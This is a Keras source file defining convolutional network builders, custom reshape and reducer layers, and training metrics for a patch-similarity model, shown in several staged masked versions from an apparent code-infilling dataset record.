tf = K.tf
x, _ = tf.nn.top_k(x, self.k, sorted=False)
return K.mean(x, axis=-1)
else:
raise NotImplementedError(
'TopKAverage is not implemented for %s backend' % (K.
backend(),))
<|reserved_special_token_0|>
def mae(y_true, y_pred):
""" Implementation of Mean average error
"""
return K.mean(K.abs(y_true - y_pred))
<|reserved_special_token_0|>
def create_simple_cnn(input_shape, kernel_regularizer=None):
common_params = dict(filters=32, kernel_size=3, kernel_regularizer=
kernel_regularizer)
return Sequential([Conv2D(input_shape=input_shape, **common_params),
BatchNormalization(), Activation('relu'), Conv2D(**common_params),
BatchNormalization(), Activation('relu'), Conv2D(**common_params),
BatchNormalization(), Activation('relu'), Conv2D(**common_params),
BatchNormalization(), Activation('relu'), Conv2D(**common_params),
BatchNormalization()])
def create_simple_cnn_ln(input_shape, kernel_regularizer=None):
common_params = dict(filters=32, kernel_size=3, kernel_regularizer=
kernel_regularizer)
return Sequential([Conv2D(input_shape=input_shape, **common_params),
LayerNormalization(), Activation('relu'), Conv2D(**common_params),
LayerNormalization(), Activation('relu'), Conv2D(**common_params),
LayerNormalization(), Activation('relu'), Conv2D(**common_params),
LayerNormalization(), Activation('relu'), Conv2D(**common_params),
LayerNormalization()])
def create_dilated_cnn_receptive_field_25(input_shape, kernel_regularizer=None
):
return Sequential([Conv2D(filters=32, kernel_size=5, input_shape=
input_shape, kernel_regularizer=kernel_regularizer),
BatchNormalization(), Activation('relu'), Conv2D(filters=32,
kernel_size=5, kernel_regularizer=kernel_regularizer),
BatchNormalization(), Activation('relu'), Conv2D(filters=32,
kernel_size=5, kernel_regularizer=kernel_regularizer, dilation_rate
=2), BatchNormalization(), Activation('relu'), Conv2D(filters=32,
kernel_size=3, kernel_regularizer=kernel_regularizer),
BatchNormalization(), Activation('relu'), Conv2D(filters=32,
kernel_size=3, kernel_regularizer=kernel_regularizer),
BatchNormalization(), Activation('relu'), Conv2D(filters=32,
kernel_size=3, kernel_regularizer=kernel_regularizer),
BatchNormalization(), Activation('relu'), Conv2D(filters=32,
kernel_size=3, kernel_regularizer=kernel_regularizer),
BatchNormalization()])
<|reserved_special_token_0|>
def cnn_factory(name):
cnn_factories = {'simple_cnn': create_simple_cnn, 'simple_cnn_ln':
create_simple_cnn_ln, 'dilated_cnn_receptive_field_25':
create_dilated_cnn_receptive_field_25,
'dilated_cnn_receptive_field_25_with_tanh':
create_dilated_cnn_receptive_field_25_with_tanh, 'hartmann_cnn':
create_hartmann_cnn}
return cnn_factories[name]
<|reserved_special_token_0|>
def build_simple_nn_for_training(input_shape, create_cnn, optimizer='Adam',
lr=0.001, momentum=None, clipnorm=0.0, loss='emd', reducer='average',
merge_layer='dot-product', weight_decay=None, weight_file=None):
assert len(input_shape) == 5
input_shape = list(input_shape)
for i in range(len(input_shape)):
if input_shape[i] != None:
input_shape[i] = int(input_shape[i])
input_shape = tuple(input_shape)
D, N, W, H, C = input_shape
x1_in = Input(shape=input_shape)
x2_in = Input(shape=input_shape)
x1 = TotalReshape((-1, W, H, C))(x1_in)
x2 = TotalReshape((-1, W, H, C))(x2_in)
cnn = create_cnn(input_shape=(W, H, C), kernel_regularizer=weight_decay)
x1 = Flatten()(cnn(x1))
x2 = Flatten()(cnn(x2))
x = Dot(axes=-1, normalize=merge_layer == 'cosine-similarity')([x1, x2])
x = TotalReshape((-1, D, N))(x)
x = reducer_factory(reducer)(x)
y = Activation('softmax')(x)
model = Model(inputs=[x1_in, x2_in], outputs=y)
model.compile(optimizer=optimizer_factory(optimizer, lr=lr, momentum=
momentum, clipnorm=clipnorm), loss=loss_factory(loss), metrics=[
'accuracy', mae, mde])
if weight_file:
model.load_weights(weight_file, by_name=True)
return model
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TotalReshape(Layer):
def __init__(self, target_shape, **kwargs):
self.target_shape = target_shape
super(TotalReshape, self).__init__(**kwargs)
def compute_output_shape(self, input_shape):
return tuple(x if x != -1 else None for x in self.target_shape)
def call(self, x):
return K.reshape(x, self.target_shape)
class BaseReducer(Layer):
def __init__(self, **kwargs):
super(BaseReducer, self).__init__(**kwargs)
def compute_output_shape(self, input_shape):
return input_shape[:-1]
class Average(BaseReducer):
def call(self, x):
return K.mean(x, axis=-1)
class Max(BaseReducer):
def call(self, x):
return K.max(x, axis=-1)
class TopKAverage(BaseReducer):
def __init__(self, k, **kwargs):
self.k = k
super(TopKAverage, self).__init__(**kwargs)
def call(self, x):
if K.backend() == 'tensorflow':
tf = K.tf
x, _ = tf.nn.top_k(x, self.k, sorted=False)
return K.mean(x, axis=-1)
else:
raise NotImplementedError(
'TopKAverage is not implemented for %s backend' % (K.
backend(),))
<|reserved_special_token_0|>
def mae(y_true, y_pred):
""" Implementation of Mean average error
"""
return K.mean(K.abs(y_true - y_pred))
def mde(y_true, y_pred):
return K.mean(K.cast(K.abs(K.argmax(y_true, axis=1) - K.argmax(y_pred,
axis=1)), K.floatx()))
def create_simple_cnn(input_shape, kernel_regularizer=None):
common_params = dict(filters=32, kernel_size=3, kernel_regularizer=
kernel_regularizer)
return Sequential([Conv2D(input_shape=input_shape, **common_params),
BatchNormalization(), Activation('relu'), Conv2D(**common_params),
BatchNormalization(), Activation('relu'), Conv2D(**common_params),
BatchNormalization(), Activation('relu'), Conv2D(**common_params),
BatchNormalization(), Activation('relu'), Conv2D(**common_params),
BatchNormalization()])
def create_simple_cnn_ln(input_shape, kernel_regularizer=None):
common_params = dict(filters=32, kernel_size=3, kernel_regularizer=
kernel_regularizer)
return Sequential([Conv2D(input_shape=input_shape, **common_params),
LayerNormalization(), Activation('relu'), Conv2D(**common_params),
LayerNormalization(), Activation('relu'), Conv2D(**common_params),
LayerNormalization(), Activation('relu'), Conv2D(**common_params),
LayerNormalization(), Activation('relu'), Conv2D(**common_params),
LayerNormalization()])
def create_dilated_cnn_receptive_field_25(input_shape, kernel_regularizer=None
):
return Sequential([Conv2D(filters=32, kernel_size=5, input_shape=
input_shape, kernel_regularizer=kernel_regularizer),
BatchNormalization(), Activation('relu'), Conv2D(filters=32,
kernel_size=5, kernel_regularizer=kernel_regularizer),
BatchNormalization(), Activation('relu'), Conv2D(filters=32,
kernel_size=5, kernel_regularizer=kernel_regularizer, dilation_rate
=2), BatchNormalization(), Activation('relu'), Conv2D(filters=32,
kernel_size=3, kernel_regularizer=kernel_regularizer),
BatchNormalization(), Activation('relu'), Conv2D(filters=32,
kernel_size=3, kernel_regularizer=kernel_regularizer),
BatchNormalization(), Activation('relu'), Conv2D(filters=32,
kernel_size=3, kernel_regularizer=kernel_regularizer),
BatchNormalization(), Activation('relu'), Conv2D(filters=32,
kernel_size=3, kernel_regularizer=kernel_regularizer),
BatchNormalization()])
def create_dilated_cnn_receptive_field_25_with_tanh(input_shape,
kernel_regularizer=None):
return Sequential([Conv2D(filters=32, kernel_size=5, input_shape=
input_shape, kernel_regularizer=kernel_regularizer),
BatchNormalization(), Activation('tanh'), Conv2D(filters=32,
kernel_size=5, kernel_regularizer=kernel_regularizer),
BatchNormalization(), Activation('tanh'), Conv2D(filters=32,
kernel_size=5, kernel_regularizer=kernel_regularizer, dilation_rate
=2), BatchNormalization(), Activation('tanh'), Conv2D(filters=32,
kernel_size=3, kernel_regularizer=kernel_regularizer),
BatchNormalization(), Activation('tanh'), Conv2D(filters=32,
kernel_size=3, kernel_regularizer=kernel_regularizer),
BatchNormalization(), Activation('tanh'), Conv2D(filters=32,
kernel_size=3, kernel_regularizer=kernel_regularizer),
BatchNormalization(), Activation('tanh'), Conv2D(filters=32,
kernel_size=3, kernel_regularizer=kernel_regularizer),
BatchNormalization()])
def create_hartmann_cnn(input_shape, kernel_regularizer=None):
return Sequential([Conv2D(filters=32, kernel_size=5, input_shape=
input_shape), Activation('tanh'), MaxPooling2D(pool_size=(2, 2)),
Conv2D(filters=64, kernel_size=5), Activation('tanh'), MaxPooling2D
(pool_size=(2, 2))])
def cnn_factory(name):
cnn_factories = {'simple_cnn': create_simple_cnn, 'simple_cnn_ln':
create_simple_cnn_ln, 'dilated_cnn_receptive_field_25':
create_dilated_cnn_receptive_field_25,
'dilated_cnn_receptive_field_25_with_tanh':
create_dilated_cnn_receptive_field_25_with_tanh, 'hartmann_cnn':
create_hartmann_cnn}
return cnn_factories[name]
<|reserved_special_token_0|>
def build_simple_cnn(input_shape, create_cnn, optimizer='Adam', lr=0.001,
momentum=None, clipnorm=0.0, loss='mse', reducer='average', merge_layer
='dot-product', weight_decay=None, weight_file=None):
assert len(input_shape) == 5
D, N, W, H, C = input_shape
model = create_cnn(input_shape=(None, None, C), kernel_regularizer=
weight_decay)
model.compile(optimizer=optimizer_factory(optimizer, lr=lr, momentum=
momentum, clipnorm=clipnorm), loss=loss_factory(loss))
if weight_file:
try:
f = h5py.File(weight_file, 'r')
keys = [os.path.join(model.name, w.name) for l in model.layers for
w in l.weights]
weights = [f[os.path.join('model_weights', k)][:] for k in keys]
model.set_weights(weights)
except:
model.load_weights(weight_file, by_name=True)
return model
def build_simple_nn_for_training(input_shape, create_cnn, optimizer='Adam',
lr=0.001, momentum=None, clipnorm=0.0, loss='emd', reducer='average',
merge_layer='dot-product', weight_decay=None, weight_file=None):
assert len(input_shape) == 5
input_shape = list(input_shape)
for i in range(len(input_shape)):
if input_shape[i] != None:
input_shape[i] = int(input_shape[i])
input_shape = tuple(input_shape)
D, N, W, H, C = input_shape
x1_in = Input(shape=input_shape)
x2_in = Input(shape=input_shape)
x1 = TotalReshape((-1, W, H, C))(x1_in)
x2 = TotalReshape((-1, W, H, C))(x2_in)
cnn = create_cnn(input_shape=(W, H, C), kernel_regularizer=weight_decay)
x1 = Flatten()(cnn(x1))
x2 = Flatten()(cnn(x2))
x = Dot(axes=-1, normalize=merge_layer == 'cosine-similarity')([x1, x2])
x = TotalReshape((-1, D, N))(x)
x = reducer_factory(reducer)(x)
y = Activation('softmax')(x)
model = Model(inputs=[x1_in, x2_in], outputs=y)
model.compile(optimizer=optimizer_factory(optimizer, lr=lr, momentum=
momentum, clipnorm=clipnorm), loss=loss_factory(loss), metrics=[
'accuracy', mae, mde])
if weight_file:
model.load_weights(weight_file, by_name=True)
return model
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TotalReshape(Layer):
def __init__(self, target_shape, **kwargs):
self.target_shape = target_shape
super(TotalReshape, self).__init__(**kwargs)
def compute_output_shape(self, input_shape):
return tuple(x if x != -1 else None for x in self.target_shape)
def call(self, x):
return K.reshape(x, self.target_shape)
class BaseReducer(Layer):
def __init__(self, **kwargs):
super(BaseReducer, self).__init__(**kwargs)
def compute_output_shape(self, input_shape):
return input_shape[:-1]
class Average(BaseReducer):
def call(self, x):
return K.mean(x, axis=-1)
class Max(BaseReducer):
def call(self, x):
return K.max(x, axis=-1)
class TopKAverage(BaseReducer):
def __init__(self, k, **kwargs):
self.k = k
super(TopKAverage, self).__init__(**kwargs)
def call(self, x):
if K.backend() == 'tensorflow':
tf = K.tf
x, _ = tf.nn.top_k(x, self.k, sorted=False)
return K.mean(x, axis=-1)
else:
raise NotImplementedError(
'TopKAverage is not implemented for %s backend' % (K.
backend(),))
def reducer_factory(reducer, k=3):
if reducer == 'max':
return Max()
elif reducer == 'average':
return Average()
elif reducer == 'topK':
return TopKAverage(k)
def mae(y_true, y_pred):
""" Implementation of Mean average error
"""
return K.mean(K.abs(y_true - y_pred))
def mde(y_true, y_pred):
return K.mean(K.cast(K.abs(K.argmax(y_true, axis=1) - K.argmax(y_pred,
axis=1)), K.floatx()))
def create_simple_cnn(input_shape, kernel_regularizer=None):
common_params = dict(filters=32, kernel_size=3, kernel_regularizer=
kernel_regularizer)
return Sequential([Conv2D(input_shape=input_shape, **common_params),
BatchNormalization(), Activation('relu'), Conv2D(**common_params),
BatchNormalization(), Activation('relu'), Conv2D(**common_params),
BatchNormalization(), Activation('relu'), Conv2D(**common_params),
BatchNormalization(), Activation('relu'), Conv2D(**common_params),
BatchNormalization()])
def create_simple_cnn_ln(input_shape, kernel_regularizer=None):
common_params = dict(filters=32, kernel_size=3, kernel_regularizer=
kernel_regularizer)
return Sequential([Conv2D(input_shape=input_shape, **common_params),
LayerNormalization(), Activation('relu'), Conv2D(**common_params),
LayerNormalization(), Activation('relu'), Conv2D(**common_params),
LayerNormalization(), Activation('relu'), Conv2D(**common_params),
LayerNormalization(), Activation('relu'), Conv2D(**common_params),
LayerNormalization()])
def create_dilated_cnn_receptive_field_25(input_shape, kernel_regularizer=None
):
return Sequential([Conv2D(filters=32, kernel_size=5, input_shape=
input_shape, kernel_regularizer=kernel_regularizer),
BatchNormalization(), Activation('relu'), Conv2D(filters=32,
kernel_size=5, kernel_regularizer=kernel_regularizer),
BatchNormalization(), Activation('relu'), Conv2D(filters=32,
kernel_size=5, kernel_regularizer=kernel_regularizer, dilation_rate
=2), BatchNormalization(), Activation('relu'), Conv2D(filters=32,
kernel_size=3, kernel_regularizer=kernel_regularizer),
BatchNormalization(), Activation('relu'), Conv2D(filters=32,
kernel_size=3, kernel_regularizer=kernel_regularizer),
BatchNormalization(), Activation('relu'), Conv2D(filters=32,
kernel_size=3, kernel_regularizer=kernel_regularizer),
BatchNormalization(), Activation('relu'), Conv2D(filters=32,
kernel_size=3, kernel_regularizer=kernel_regularizer),
BatchNormalization()])
def create_dilated_cnn_receptive_field_25_with_tanh(input_shape,
kernel_regularizer=None):
return Sequential([Conv2D(filters=32, kernel_size=5, input_shape=
input_shape, kernel_regularizer=kernel_regularizer),
BatchNormalization(), Activation('tanh'), Conv2D(filters=32,
kernel_size=5, kernel_regularizer=kernel_regularizer),
BatchNormalization(), Activation('tanh'), Conv2D(filters=32,
kernel_size=5, kernel_regularizer=kernel_regularizer, dilation_rate
=2), BatchNormalization(), Activation('tanh'), Conv2D(filters=32,
kernel_size=3, kernel_regularizer=kernel_regularizer),
BatchNormalization(), Activation('tanh'), Conv2D(filters=32,
kernel_size=3, kernel_regularizer=kernel_regularizer),
BatchNormalization(), Activation('tanh'), Conv2D(filters=32,
kernel_size=3, kernel_regularizer=kernel_regularizer),
BatchNormalization(), Activation('tanh'), Conv2D(filters=32,
kernel_size=3, kernel_regularizer=kernel_regularizer),
BatchNormalization()])
def create_hartmann_cnn(input_shape, kernel_regularizer=None):
return Sequential([Conv2D(filters=32, kernel_size=5, input_shape=
input_shape), Activation('tanh'), MaxPooling2D(pool_size=(2, 2)),
Conv2D(filters=64, kernel_size=5), Activation('tanh'), MaxPooling2D
(pool_size=(2, 2))])
def cnn_factory(name):
cnn_factories = {'simple_cnn': create_simple_cnn, 'simple_cnn_ln':
create_simple_cnn_ln, 'dilated_cnn_receptive_field_25':
create_dilated_cnn_receptive_field_25,
'dilated_cnn_receptive_field_25_with_tanh':
create_dilated_cnn_receptive_field_25_with_tanh, 'hartmann_cnn':
create_hartmann_cnn}
return cnn_factories[name]
def optimizer_factory(optimizer, lr, momentum=None, clipnorm=0.0, clipvalue=1):
if optimizer == 'Adam':
return Adam(lr=lr, clipnorm=clipnorm, clipvalue=clipvalue)
elif optimizer == 'SGD':
return SGD(lr=lr, momentum=momentum, clipnorm=clipnorm, clipvalue=
clipvalue)
def kernel_regularizer_factory(regularizer_factor):
if regularizer_factor == 0.0:
return None
else:
return regularizers.l2(regularizer_factor)
def build_simple_cnn(input_shape, create_cnn, optimizer='Adam', lr=0.001,
momentum=None, clipnorm=0.0, loss='mse', reducer='average', merge_layer
='dot-product', weight_decay=None, weight_file=None):
assert len(input_shape) == 5
D, N, W, H, C = input_shape
model = create_cnn(input_shape=(None, None, C), kernel_regularizer=
weight_decay)
model.compile(optimizer=optimizer_factory(optimizer, lr=lr, momentum=
momentum, clipnorm=clipnorm), loss=loss_factory(loss))
if weight_file:
try:
f = h5py.File(weight_file, 'r')
keys = [os.path.join(model.name, w.name) for l in model.layers for
w in l.weights]
weights = [f[os.path.join('model_weights', k)][:] for k in keys]
model.set_weights(weights)
except:
model.load_weights(weight_file, by_name=True)
return model
def build_simple_nn_for_training(input_shape, create_cnn, optimizer='Adam',
lr=0.001, momentum=None, clipnorm=0.0, loss='emd', reducer='average',
merge_layer='dot-product', weight_decay=None, weight_file=None):
assert len(input_shape) == 5
input_shape = list(input_shape)
for i in range(len(input_shape)):
if input_shape[i] != None:
input_shape[i] = int(input_shape[i])
input_shape = tuple(input_shape)
D, N, W, H, C = input_shape
x1_in = Input(shape=input_shape)
x2_in = Input(shape=input_shape)
x1 = TotalReshape((-1, W, H, C))(x1_in)
x2 = TotalReshape((-1, W, H, C))(x2_in)
cnn = create_cnn(input_shape=(W, H, C), kernel_regularizer=weight_decay)
x1 = Flatten()(cnn(x1))
x2 = Flatten()(cnn(x2))
x = Dot(axes=-1, normalize=merge_layer == 'cosine-similarity')([x1, x2])
x = TotalReshape((-1, D, N))(x)
x = reducer_factory(reducer)(x)
y = Activation('softmax')(x)
model = Model(inputs=[x1_in, x2_in], outputs=y)
model.compile(optimizer=optimizer_factory(optimizer, lr=lr, momentum=
momentum, clipnorm=clipnorm), loss=loss_factory(loss), metrics=[
'accuracy', mae, mde])
if weight_file:
model.load_weights(weight_file, by_name=True)
return model
def build_hartmann_network(input_shape, create_cnn=create_hartmann_cnn,
optimizer='SGD', lr=0.001, momentum=None, clipnorm=0.0, loss=None,
reducer=None, merge_layer=None, weight_decay=None, weight_file=None):
assert len(input_shape) == 3
H, W, C = input_shape
cnn = create_hartmann_cnn(input_shape=(None, None, C))
sim = Sequential([Conv2D(filters=2048, kernel_size=5, input_shape=K.
int_shape(cnn.output)[1:]), Activation('relu'), Conv2D(filters=2048,
kernel_size=1), Activation('relu'), Conv2D(filters=2, kernel_size=1
), Activation('softmax')])
x_in = [Input(shape=input_shape) for i in range(5)]
x = [cnn(xi) for xi in x_in]
x = KerasAverage()(x)
y = sim(x)
model = Model(inputs=x_in, outputs=y)
model.compile(optimizer=optimizer_factory(optimizer, lr=lr, momentum=
momentum, clipnorm=clipnorm), loss='categorical_crossentropy',
metrics=['accuracy'])
cnn.compile('sgd', 'mse')
sim.compile('sgd', 'mse')
model.cnn = cnn
model.sim = sim
if weight_file:
model.load_weights(weight_file, by_name=True)
return model
def get_nn(name):
models = {'simple_cnn': build_simple_cnn, 'simple_nn_for_training':
build_simple_nn_for_training, 'hartmann': build_hartmann_network}
return models[name]
<|reserved_special_token_1|>
import os
import h5py
import numpy as np
from keras import backend as K
from keras.layers import Activation, BatchNormalization, Conv2D, Dense, Dot, \
Dropout, Flatten, Input, MaxPooling2D, GlobalAveragePooling2D
from keras import regularizers
from keras.layers import Average as KerasAverage
from keras.models import Sequential, Model
from keras.optimizers import Adam, SGD
from keras.engine.topology import Layer
from .layers import LayerNormalization, CustomSoftmax
from .tf_implementations.loss_functions import loss_factory
class TotalReshape(Layer):
def __init__(self, target_shape, **kwargs):
self.target_shape = target_shape
super(TotalReshape, self).__init__(**kwargs)
def compute_output_shape(self, input_shape):
return tuple(
x if x != -1 else None
for x in self.target_shape
)
def call(self, x):
return K.reshape(x, self.target_shape)
class BaseReducer(Layer):
def __init__(self, **kwargs):
super(BaseReducer, self).__init__(**kwargs)
def compute_output_shape(self, input_shape):
return input_shape[:-1]
class Average(BaseReducer):
def call(self, x):
return K.mean(x, axis=-1)
class Max(BaseReducer):
def call(self, x):
return K.max(x, axis=-1)
class TopKAverage(BaseReducer):
def __init__(self, k, **kwargs):
self.k = k
super(TopKAverage, self).__init__(**kwargs)
def call(self, x):
if K.backend() == "tensorflow":
tf = K.tf
x, _ = tf.nn.top_k(x, self.k, sorted=False)
return K.mean(x, axis=-1)
else:
raise NotImplementedError("TopKAverage is not implemented for "
" %s backend" % (K.backend(),))
def reducer_factory(reducer, k=3):
# Set the type of the reducer to be used
if reducer == "max":
return Max()
elif reducer == "average":
return Average()
elif reducer == "topK":
return TopKAverage(k)
def mae(y_true, y_pred):
""" Implementation of Mean average error
"""
return K.mean(K.abs(y_true - y_pred))
def mde(y_true, y_pred):
return K.mean(K.cast(
K.abs(K.argmax(y_true, axis=1) - K.argmax(y_pred, axis=1)),
K.floatx()
))
def create_simple_cnn(input_shape, kernel_regularizer=None):
common_params = dict(
filters=32,
kernel_size=3,
kernel_regularizer=kernel_regularizer
)
return Sequential([
Conv2D(input_shape=input_shape, **common_params),
BatchNormalization(),
Activation("relu"),
Conv2D(**common_params),
BatchNormalization(),
Activation("relu"),
Conv2D(**common_params),
BatchNormalization(),
Activation("relu"),
Conv2D(**common_params),
BatchNormalization(),
Activation("relu"),
Conv2D(**common_params),
BatchNormalization()
])
def create_simple_cnn_ln(input_shape, kernel_regularizer=None):
common_params = dict(
filters=32,
kernel_size=3,
kernel_regularizer=kernel_regularizer
)
return Sequential([
Conv2D(input_shape=input_shape, **common_params),
LayerNormalization(),
Activation("relu"),
Conv2D(**common_params),
LayerNormalization(),
Activation("relu"),
Conv2D(**common_params),
LayerNormalization(),
Activation("relu"),
Conv2D(**common_params),
LayerNormalization(),
Activation("relu"),
Conv2D(**common_params),
LayerNormalization()
])
def create_dilated_cnn_receptive_field_25(
input_shape,
kernel_regularizer=None
):
return Sequential([
Conv2D(
filters=32,
kernel_size=5,
input_shape=input_shape,
kernel_regularizer=kernel_regularizer
),
BatchNormalization(),
Activation("relu"),
Conv2D(
filters=32,
kernel_size=5,
kernel_regularizer=kernel_regularizer
),
BatchNormalization(),
Activation("relu"),
Conv2D(
filters=32,
kernel_size=5,
kernel_regularizer=kernel_regularizer,
dilation_rate=2
),
BatchNormalization(),
Activation("relu"),
Conv2D(
filters=32,
kernel_size=3,
kernel_regularizer=kernel_regularizer,
),
BatchNormalization(),
Activation("relu"),
Conv2D(
filters=32,
kernel_size=3,
kernel_regularizer=kernel_regularizer
),
BatchNormalization(),
Activation("relu"),
Conv2D(
filters=32,
kernel_size=3,
kernel_regularizer=kernel_regularizer
),
BatchNormalization(),
Activation("relu"),
Conv2D(
filters=32,
kernel_size=3,
kernel_regularizer=kernel_regularizer
),
BatchNormalization()
])
def create_dilated_cnn_receptive_field_25_with_tanh(
input_shape,
kernel_regularizer=None
):
return Sequential([
Conv2D(
filters=32,
kernel_size=5,
input_shape=input_shape,
kernel_regularizer=kernel_regularizer
),
BatchNormalization(),
Activation("tanh"),
Conv2D(
filters=32,
kernel_size=5,
kernel_regularizer=kernel_regularizer
),
BatchNormalization(),
Activation("tanh"),
Conv2D(
filters=32,
kernel_size=5,
kernel_regularizer=kernel_regularizer,
dilation_rate=2
),
BatchNormalization(),
Activation("tanh"),
Conv2D(
filters=32,
kernel_size=3,
kernel_regularizer=kernel_regularizer,
),
BatchNormalization(),
Activation("tanh"),
Conv2D(
filters=32,
kernel_size=3,
kernel_regularizer=kernel_regularizer
),
BatchNormalization(),
Activation("tanh"),
Conv2D(
filters=32,
kernel_size=3,
kernel_regularizer=kernel_regularizer
),
BatchNormalization(),
Activation("tanh"),
Conv2D(
filters=32,
kernel_size=3,
kernel_regularizer=kernel_regularizer
),
BatchNormalization()
])
def create_hartmann_cnn(input_shape, kernel_regularizer=None):
return Sequential([
Conv2D(filters=32, kernel_size=5, input_shape=input_shape),
Activation("tanh"),
MaxPooling2D(pool_size=(2, 2)),
Conv2D(filters=64, kernel_size=5),
Activation("tanh"),
MaxPooling2D(pool_size=(2, 2))
])
def cnn_factory(name):
cnn_factories = {
"simple_cnn": create_simple_cnn,
"simple_cnn_ln": create_simple_cnn_ln,
"dilated_cnn_receptive_field_25":
create_dilated_cnn_receptive_field_25,
"dilated_cnn_receptive_field_25_with_tanh":
create_dilated_cnn_receptive_field_25_with_tanh,
"hartmann_cnn": create_hartmann_cnn
}
return cnn_factories[name]
def optimizer_factory(optimizer, lr, momentum=None, clipnorm=0.0, clipvalue=1):
# Set the type of optimizer to be used
if optimizer == "Adam":
return Adam(lr=lr, clipnorm=clipnorm, clipvalue=clipvalue)
elif optimizer == "SGD":
return SGD(lr=lr, momentum=momentum, clipnorm=clipnorm,
clipvalue=clipvalue)
def kernel_regularizer_factory(regularizer_factor):
if regularizer_factor == 0.0:
return None
else:
return regularizers.l2(regularizer_factor)
def build_simple_cnn(
input_shape,
create_cnn,
optimizer="Adam",
lr=1e-3,
momentum=None,
clipnorm=0.0,
loss="mse",
reducer="average",
merge_layer="dot-product",
weight_decay=None,
weight_file=None
):
# Make sure that we have a proper input shape
# TODO: Maybe change this to 3, because we finally need only the
# patch_shape?
assert len(input_shape) == 5
# Unpack the input shape to make the code more readable
D, N, W, H, C = input_shape
model = create_cnn(
input_shape=(None, None, C),
kernel_regularizer=weight_decay
)
model.compile(
optimizer=optimizer_factory(
optimizer,
lr=lr,
momentum=momentum,
clipnorm=clipnorm
),
loss=loss_factory(loss)
)
# If there is a weight file specified load the weights
if weight_file:
try:
f = h5py.File(weight_file, "r")
keys = [os.path.join(model.name, w.name)
for l in model.layers for w in l.weights]
weights = [f[os.path.join("model_weights", k)][:] for k in keys]
model.set_weights(weights)
except:
model.load_weights(weight_file, by_name=True)
return model
def build_simple_nn_for_training(
input_shape,
create_cnn,
optimizer="Adam",
lr=1e-3,
momentum=None,
clipnorm=0.0,
loss="emd",
reducer="average",
merge_layer="dot-product",
weight_decay=None,
weight_file=None
):
# Make sure that we have a proper input shape
assert len(input_shape) == 5
# Unpack the input shape to make the code more readable
# print(input_shape)
input_shape=list(input_shape)
for i in range(len(input_shape)):
if input_shape[i]!=None:
input_shape[i]=int(input_shape[i])
input_shape=tuple(input_shape)
D, N, W, H, C = input_shape
# Create the two stream inputs
x1_in = Input(shape=input_shape)
x2_in = Input(shape=input_shape)
# Reshape them for input in the CNN
x1 = TotalReshape((-1, W, H, C))(x1_in)
x2 = TotalReshape((-1, W, H, C))(x2_in)
# Create the CNN and extract features from both streams
cnn = create_cnn(input_shape=(W, H, C), kernel_regularizer=weight_decay)
x1 = Flatten()(cnn(x1))
x2 = Flatten()(cnn(x2))
# Compute a kind of similarity between the features of the two streams
x = Dot(axes=-1, normalize=(merge_layer == "cosine-similarity"))([x1, x2])
# Reshape them back into their semantic shape (depth planes, patches, etc)
x = TotalReshape((-1, D, N))(x)
# Compute the final similarity scores for each depth plane
x = reducer_factory(reducer)(x)
# Compute the final output
y = Activation("softmax")(x)
model = Model(inputs=[x1_in, x2_in], outputs=y)
model.compile(
optimizer=optimizer_factory(
optimizer,
lr=lr,
momentum=momentum,
clipnorm=clipnorm
),
loss=loss_factory(loss),
metrics=["accuracy", mae, mde]
)
if weight_file:
model.load_weights(weight_file, by_name=True)
return model
def build_hartmann_network(
input_shape,
create_cnn=create_hartmann_cnn,
optimizer="SGD",
lr=1e-3,
momentum=None,
clipnorm=0.0,
loss=None,
reducer=None,
merge_layer=None,
weight_decay=None,
weight_file=None
):
# Make sure that we have a proper input shape
assert len(input_shape) == 3
# Unpack the input shape to make the code more readable
H, W, C = input_shape
# Create the feature extracting CNN
cnn = create_hartmann_cnn(input_shape=(None, None, C))
# Create the similarity CNN
sim = Sequential([
Conv2D(
filters=2048,
kernel_size=5,
input_shape=K.int_shape(cnn.output)[1:]
),
Activation("relu"),
Conv2D(filters=2048, kernel_size=1),
Activation("relu"),
Conv2D(filters=2, kernel_size=1),
Activation("softmax")
])
# Create the joint model for training
x_in = [Input(shape=input_shape) for i in range(5)]
x = [cnn(xi) for xi in x_in]
x = KerasAverage()(x)
y = sim(x)
model = Model(inputs=x_in, outputs=y)
# Compile all the models
model.compile(
optimizer=optimizer_factory(
optimizer,
lr=lr,
momentum=momentum,
clipnorm=clipnorm
),
loss="categorical_crossentropy",
metrics=["accuracy"]
)
cnn.compile("sgd", "mse") # Just so that we can run predict()
sim.compile("sgd", "mse")
# Attach the cnn and sim to the model in case someone wants to use them
model.cnn = cnn
model.sim = sim
if weight_file:
model.load_weights(weight_file, by_name=True)
return model
def get_nn(name):
models = {
"simple_cnn": build_simple_cnn,
"simple_nn_for_training": build_simple_nn_for_training,
"hartmann": build_hartmann_network
}
return models[name]
|
flexible
|
{
"blob_id": "0eefae7e0d341d74154bbe480f5ed766829e3ce3",
"index": 3734,
"step-1": "<mask token>\n\n\nclass TotalReshape(Layer):\n\n def __init__(self, target_shape, **kwargs):\n self.target_shape = target_shape\n super(TotalReshape, self).__init__(**kwargs)\n\n def compute_output_shape(self, input_shape):\n return tuple(x if x != -1 else None for x in self.target_shape)\n\n def call(self, x):\n return K.reshape(x, self.target_shape)\n\n\nclass BaseReducer(Layer):\n\n def __init__(self, **kwargs):\n super(BaseReducer, self).__init__(**kwargs)\n\n def compute_output_shape(self, input_shape):\n return input_shape[:-1]\n\n\nclass Average(BaseReducer):\n\n def call(self, x):\n return K.mean(x, axis=-1)\n\n\nclass Max(BaseReducer):\n\n def call(self, x):\n return K.max(x, axis=-1)\n\n\nclass TopKAverage(BaseReducer):\n\n def __init__(self, k, **kwargs):\n self.k = k\n super(TopKAverage, self).__init__(**kwargs)\n\n def call(self, x):\n if K.backend() == 'tensorflow':\n tf = K.tf\n x, _ = tf.nn.top_k(x, self.k, sorted=False)\n return K.mean(x, axis=-1)\n else:\n raise NotImplementedError(\n 'TopKAverage is not implemented for %s backend' % (K.\n backend(),))\n\n\n<mask token>\n\n\ndef create_simple_cnn_ln(input_shape, kernel_regularizer=None):\n common_params = dict(filters=32, kernel_size=3, kernel_regularizer=\n kernel_regularizer)\n return Sequential([Conv2D(input_shape=input_shape, **common_params),\n LayerNormalization(), Activation('relu'), Conv2D(**common_params),\n LayerNormalization(), Activation('relu'), Conv2D(**common_params),\n LayerNormalization(), Activation('relu'), Conv2D(**common_params),\n LayerNormalization(), Activation('relu'), Conv2D(**common_params),\n LayerNormalization()])\n\n\n<mask token>\n\n\ndef cnn_factory(name):\n cnn_factories = {'simple_cnn': create_simple_cnn, 'simple_cnn_ln':\n 